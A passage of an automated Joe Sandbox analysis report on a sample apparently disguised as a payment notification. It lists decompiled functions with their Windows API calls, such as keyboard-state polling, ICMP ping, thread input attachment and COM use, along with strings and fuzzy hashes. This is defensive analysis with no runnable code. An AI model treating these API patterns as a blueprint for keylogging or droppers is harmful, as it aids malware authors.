Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bab93b47ca018e488f26a9e386b332bd3c6ff3102d1fadcfa2dfe11c66349b3f
Instruction ID: 5f06c1cc6302525bd65325cf67a85703d88dc20fc50d015e070313e77d1018ed
Opcode Fuzzy Hash: bab93b47ca018e488f26a9e386b332bd3c6ff3102d1fadcfa2dfe11c66349b3f
Instruction Fuzzy Hash: 3D414175E042199FCB04EF64D864DADBBB9FF48354F008065E94AA7361D730E945DFA0

Function 00999C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00999CA1
GetAsyncKeyState.USER32(000000A0), ref: 00999D22
GetKeyState.USER32(000000A0), ref: 00999D3D
GetAsyncKeyState.USER32(000000A1), ref: 00999D57
GetKeyState.USER32(000000A1), ref: 00999D6C
GetAsyncKeyState.USER32(00000011), ref: 00999D84
GetKeyState.USER32(00000011), ref: 00999D96
GetAsyncKeyState.USER32(00000012), ref: 00999DAE
GetKeyState.USER32(00000012), ref: 00999DC0
GetAsyncKeyState.USER32(0000005B), ref: 00999DD8
GetKeyState.USER32(0000005B), ref: 00999DEA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 63750c251dd20f5ed2eaa3ff718d6595c3f30ada202f0b8ebd10f3ea18de4280
Instruction ID: eeef27a17677eab9a6f8f2e7b4df1af5b4883428b66804a04e4c0597b6e8eb2f
Opcode Fuzzy Hash: 63750c251dd20f5ed2eaa3ff718d6595c3f30ada202f0b8ebd10f3ea18de4280
Instruction Fuzzy Hash: 36410D749087C96DFF30876CC8447B5BEE86F12344F04805EE6CA566C2EBA59DC4C792

Function 009B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009B05BC
inet_addr.WSOCK32(?), ref: 009B061C
gethostbyname.WSOCK32(?), ref: 009B0628
IcmpCreateFile.IPHLPAPI ref: 009B0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009B06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009B06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009B07B9
WSACleanup.WSOCK32 ref: 009B07BF

Strings

Ping, xrefs: 009B0676

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e5544cd65c6bdbe79f2791d40587738f615ce078bad414495c917c715a9449f6
Instruction ID: 927a6c5d5c884233ef5896d8a090a2d558d0e9e1ab65a73803a49b93202cec59
Opcode Fuzzy Hash: e5544cd65c6bdbe79f2791d40587738f615ce078bad414495c917c715a9449f6
Instruction Fuzzy Hash: 66918D756082019FD320CF15C989F5BBBE4AF84328F1485A9F46A8B6A2CB70FD45CF91

Function 009B8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 009B8CF3

Part of subcall function 00998E54: _wcslen.LIBCMT ref: 00998E77

_wcslen.LIBCMT ref: 009B8D4E
_wcslen.LIBCMT ref: 009B8D9C
_wcslen.LIBCMT ref: 009B8DDC
_wcslen.LIBCMT ref: 009B8E6E

Strings

winapi, xrefs: 009B8D96, 009B8D9B
none, xrefs: 009B8E65, 009B8E6A
stdcall, xrefs: 009B8DD6, 009B8DDB
cdecl, xrefs: 009B8D48, 009B8D4D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: e58effe48e7dda011aa3766980b8aec456625b23b6b16bc652be2be409b745f4
Instruction ID: 203de288890a92253dd81d783ea5c141220a486dd0a77d24aaec3db73e06fef8
Opcode Fuzzy Hash: e58effe48e7dda011aa3766980b8aec456625b23b6b16bc652be2be409b745f4
Instruction Fuzzy Hash: 82519431A041169BCB24EF68CA519FFB7ADBFA8734B204629E516E72C4DB35DD40C790

Function 009B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 009B3774
CoUninitialize.OLE32 ref: 009B377F
CoCreateInstance.OLE32(?,00000000,00000017,009CFB78,?), ref: 009B37D9
IIDFromString.OLE32(?,?), ref: 009B384C
VariantInit.OLEAUT32(?), ref: 009B38E4
VariantClear.OLEAUT32(?), ref: 009B3936

Strings

Invalid parameter, xrefs: 009B3865
NULL Pointer assignment, xrefs: 009B381E
Failed to create object, xrefs: 009B37E4, 009B389A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: a2575b8b057dd8a2d5686cea02031f9e093fc679baca918d6e51a4b849233414
Instruction ID: 063ede22e4cd4f53e8daa9b10cee03e8fab55f1d4fa86cce90707230b156076f
Opcode Fuzzy Hash: a2575b8b057dd8a2d5686cea02031f9e093fc679baca918d6e51a4b849233414
Instruction Fuzzy Hash: CA61B3B1608301AFD710DF54C988FAABBE8EF85724F10880DF58597291DB70EE48CB92

Function 009A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009A33CF

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009A33F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 009A3504
Incorrect parameters to object property !, xrefs: 009A34AB
Error: , xrefs: 009A34D1
"%s" (%d) : ==> %s:, xrefs: 009A3522
^ ERROR , xrefs: 009A349E
Line %d (File "%s"):, xrefs: 009A3443, 009A345C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 146447325936066c2eeea3b38878f9b6373a0f287f3efb06cb490a5e7af23a3e
Instruction ID: a5db7b121a6cc8f8f83b4641654cfcb19a7dc68d0b9bae0ebe5e54578f5a45e2
Opcode Fuzzy Hash: 146447325936066c2eeea3b38878f9b6373a0f287f3efb06cb490a5e7af23a3e
Instruction Fuzzy Hash: BD519A72C40209AADF15EBE4CD46FEEB7B8AF84344F108065F109720A2EB612F59DF61

Function 0099B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0099B5FC
_wcslen.LIBCMT ref: 0099B608
_wcslen.LIBCMT ref: 0099B64D
_wcslen.LIBCMT ref: 0099B68C
_wcslen.LIBCMT ref: 0099B6C7

Strings

EXISTS, xrefs: 0099B686, 0099B68B
KEYS, xrefs: 0099B647, 0099B64C
APPEND, xrefs: 0099B6C1, 0099B6C6
REMOVE, xrefs: 0099B602, 0099B607

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 9394854a20162cdd8049a0f78f42d634be5a11494d1b99ee8941ae57fe57d090
Instruction ID: 18b6af40e489ea4b08667e41bb79fd7bafc8334c4142473ee8ee8301a8f12175
Opcode Fuzzy Hash: 9394854a20162cdd8049a0f78f42d634be5a11494d1b99ee8941ae57fe57d090
Instruction Fuzzy Hash: F441FE32A001279BCF205F7DDE905BE77A9AFA0778B144129E521D7284E739DD81C750

Function 009A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009A53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009A5416
GetLastError.KERNEL32 ref: 009A5420
SetErrorMode.KERNEL32(00000000,READY), ref: 009A54A7

Strings

NOTREADY, xrefs: 009A544B
READONLY, xrefs: 009A5452
INVALID, xrefs: 009A5459
READY, xrefs: 009A5460, 009A5468
UNKNOWN, xrefs: 009A5444

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 6de7121b122032b2205eed26b64e17085ef30bd01493a2bb1b6fba841353e97a
Instruction ID: cea9b1c9e44fc1d02bf43775419620805c4c6463ee7bc437c8062e81e782f89e
Opcode Fuzzy Hash: 6de7121b122032b2205eed26b64e17085ef30bd01493a2bb1b6fba841353e97a
Instruction Fuzzy Hash: 4D31A075B006089FC710DF68C884BAABBF8EF5A305F198065E505DB2A2D774DD86CBD0

Function 009C3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 009C3C79
SetMenu.USER32(?,00000000), ref: 009C3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C3D10
IsMenu.USER32(?), ref: 009C3D24
CreatePopupMenu.USER32 ref: 009C3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009C3D5B
DrawMenuBar.USER32 ref: 009C3D63

Strings

0, xrefs: 009C3C54
F, xrefs: 009C3D4E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 4655db228f3ffe03f3828776d80c9ac48bb8b824f7d7eb3e6387a0683f736c63
Instruction ID: 8f3f380a4a7bcc1332df94f353b50b781dafb4597dac51daa34e43022ec360a6
Opcode Fuzzy Hash: 4655db228f3ffe03f3828776d80c9ac48bb8b824f7d7eb3e6387a0683f736c63
Instruction Fuzzy Hash: 12415BB5A05209AFDB14CF64D854F9A7BB9FF49350F14802CF946973A0D730AA11DB91

Function 009C3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009C3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009C3AA0
GetWindowLongW.USER32(?,000000F0), ref: 009C3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009C3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009C3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009C3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009C3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009C3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009C3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009C3C13

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: ba92f8e8a4a660ec1aa2e4c4c664490be16306788aec6d69cb74a1a8fc871deb
Instruction ID: 1c1403712d6d7d3c05cb5ba4b276d7d7471095ee2fc8b3f50e9ae356c8379f83
Opcode Fuzzy Hash: ba92f8e8a4a660ec1aa2e4c4c664490be16306788aec6d69cb74a1a8fc871deb
Instruction Fuzzy Hash: EA617A75A00208AFDB10DFA8CC81FEE77B8EB49700F108199FA15A72A1D774AE46DF51

Function 0099B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0099B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B165
GetWindowThreadProcessId.USER32(00000000), ref: 0099B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0099B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0099A1E1,?,00000001), ref: 0099B21D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 9bf30ee112c071dd1dab55b5f1a8fd4e55eb5f2ec0da08b8ef8a5cdb1fd85d98
Instruction ID: 98003911b5ca28130410c2d470c610e5fe9cdcac35a22a062c08ae1f2feb44f0
Opcode Fuzzy Hash: 9bf30ee112c071dd1dab55b5f1a8fd4e55eb5f2ec0da08b8ef8a5cdb1fd85d98
Instruction Fuzzy Hash: 063191B2914208BFDF20DF68EE48F6D7BADFB61311F104005FA16D6190D7B8AA428F60

Function 00962C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00962C94

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 00962CA0
_free.LIBCMT ref: 00962CAB
_free.LIBCMT ref: 00962CB6
_free.LIBCMT ref: 00962CC1
_free.LIBCMT ref: 00962CCC
_free.LIBCMT ref: 00962CD7
_free.LIBCMT ref: 00962CE2
_free.LIBCMT ref: 00962CED
_free.LIBCMT ref: 00962CFB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f16fe69bbf1e38c27da4984fa26d3a889be826292de87b78015fa6dcabfa7b0e
Instruction ID: 389f2683227613c4bfe793aa4970487d5b194d0baa9a4cc2d18f8fbd97efdeae
Opcode Fuzzy Hash: f16fe69bbf1e38c27da4984fa26d3a889be826292de87b78015fa6dcabfa7b0e
Instruction Fuzzy Hash: B011CB76600508BFCB06EF54D942DDD3BA5FF85390F4144A5F9485F232D631EE509B90

Function 00931410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00931459
OleUninitialize.OLE32(?,00000000), ref: 009314F8
UnregisterHotKey.USER32(?), ref: 009316DD
DestroyWindow.USER32(?), ref: 009724B9
FreeLibrary.KERNEL32(?), ref: 0097251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0097254B

Strings

close all, xrefs: 00931454

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: def66af57b6c70d641229a1a507aecb89742640e13503ea90a51455b34872ca9
Instruction ID: cb3c756552802d344b509b04a9cd9c316abfc1c2ef3e64e6e046961808378192
Opcode Fuzzy Hash: def66af57b6c70d641229a1a507aecb89742640e13503ea90a51455b34872ca9
Instruction Fuzzy Hash: 2FD15B72711212CFCB29EF55C899F29F7A4BF45700F1482AEE44AAB261DB31AD12CF51

Function 009A7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009A7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 009A7FC1
GetFileAttributesW.KERNEL32(?), ref: 009A7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 009A8005
SetCurrentDirectoryW.KERNEL32(?), ref: 009A8017
SetCurrentDirectoryW.KERNEL32(?), ref: 009A8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009A80B0

Strings

*.*, xrefs: 009A8066

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: ad6a4eec60b64ba6a1773c6f4cd25c7cc10a97a0bf2bd7ca335266e71ad076e3
Instruction ID: cda6016c3aa47342b3142f2ba3cb215bd2bf78ab4aeeae3bdd7eff8e4151213d
Opcode Fuzzy Hash: ad6a4eec60b64ba6a1773c6f4cd25c7cc10a97a0bf2bd7ca335266e71ad076e3
Instruction Fuzzy Hash: 6A81A1725082419BCB20DF54C845AABF7E8BF86314F244C5EF889D7261EB35DD498B92

Function 00935BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00935C7A

Part of subcall function 00935D0A: GetClientRect.USER32(?,?), ref: 00935D30
Part of subcall function 00935D0A: GetWindowRect.USER32(?,?), ref: 00935D71
Part of subcall function 00935D0A: ScreenToClient.USER32(?,?), ref: 00935D99

GetDC.USER32 ref: 009746F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00974708
SelectObject.GDI32(00000000,00000000), ref: 00974716
SelectObject.GDI32(00000000,00000000), ref: 0097472B
ReleaseDC.USER32(?,00000000), ref: 00974733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009747C4

Strings

U, xrefs: 00974693

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 16e3c04372972c0487abf9cdbab4b5d4f1b70c1605cd2a556eac287cb5ae1e38
Instruction ID: 6f70cb19ed4ab7b4c908836cabcbf08325286c548ad7af8193a0db2a536ae9c0
Opcode Fuzzy Hash: 16e3c04372972c0487abf9cdbab4b5d4f1b70c1605cd2a556eac287cb5ae1e38
Instruction Fuzzy Hash: 3071E032500209DFCF258F64C984EFA3BB9FF8A354F148269E9995A1A7C3309C41DF50

Function 009A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009A35E4

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

LoadStringW.USER32(00A02390,?,00000FFF,?), ref: 009A360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 009A3724
Error: , xrefs: 009A36EF
"%s" (%d) : ==> %s:, xrefs: 009A3742
^ ERROR, xrefs: 009A36C9
